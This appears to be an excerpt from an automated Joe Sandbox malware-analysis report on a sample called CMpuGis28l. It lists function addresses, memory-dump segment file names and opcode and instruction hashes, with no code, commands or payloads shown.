                                                        Function 0103C320 Relevance: .3, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77fb6b5839f4b27b2cc0de7a76fe9ee0fcfa257e667b1f2ef756ec1c5a37e2ec
                                                        • Instruction ID: e4aa4a3a8d183e7404665700bb746c07fc4e0fa8c2e819ceed08bd8804668333
                                                        • Opcode Fuzzy Hash: 77fb6b5839f4b27b2cc0de7a76fe9ee0fcfa257e667b1f2ef756ec1c5a37e2ec
                                                        • Instruction Fuzzy Hash: 62C10971914B418BE362CF38C941BE6F7E5BFD9300F109A1EE5EAA6241EB707584CB51
                                                        Function 012D6730 Relevance: .2, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe607d05944d72bed57fd6595b9237e21a87d11eb2b6f2cf2d112af2a805d552
                                                        • Instruction ID: 82e2e531fcd477efa71376362bd6ce6cd93a78fab23fecffaf4eaacef00af917
                                                        • Opcode Fuzzy Hash: fe607d05944d72bed57fd6595b9237e21a87d11eb2b6f2cf2d112af2a805d552
                                                        • Instruction Fuzzy Hash: 0981FA72D24B828BD3158F68C8916B6B7A0FFDA314F249B1EE9E607743E7749580C781
                                                        Function 0122AB2C Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                        • Instruction ID: 982c508680da3207764b4130396f7f8d827dbad51452534f1945b46b555b5403
                                                        • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                        • Instruction Fuzzy Hash: AAF0C233B7123A0BA360CDBA6C001EBA2C3B3D4270F1F89A5DC44D7902E934CC4686C6
                                                        Function 01D005B5 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CFD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
                                                        • Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
                                                        Function 01D005B5 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CFE000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
                                                        • Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
                                                        Function 01D005B5 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2522201658.0000000001CFD000.00000004.00000020.00020000.00000000.sdmp, Offset: 01CF0000, based on PE: false
                                                        • Associated: 00000000.00000003.2522167712.0000000001CF0000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_1cf0000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction ID: 8699994e4c09b7169d4898d8546c02cf7c38a1427cbccc647debab04cffbde05
                                                        • Opcode Fuzzy Hash: d5a3f7c2ac11c1695abf937ed2721680e5fa19f2c72b43b9234e45bf4bbe5758
                                                        • Instruction Fuzzy Hash: 92D0011100E3C00EC30BA7605D39BA42FB0AF83204F0F41E7D089CE0E3DA080A28D322
                                                        Function 00FD6810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: [
                                                        • API String ID: 0-784033777
                                                        • Opcode ID: e400af4fd4a76bf3d13d1af7734cf46d80a4ff9e3e1d165a5d57f8f50e032e81
                                                        • Instruction ID: bf569e368333cc24a0702b8c1d82eff8d578a5736a7a34ee2a6680d4e29bece1
                                                        • Opcode Fuzzy Hash: e400af4fd4a76bf3d13d1af7734cf46d80a4ff9e3e1d165a5d57f8f50e032e81
                                                        • Instruction Fuzzy Hash: A4B15772D183816BDB359A24C89073ABBDAEF95328F1C052FE8C5C6381E739D844B752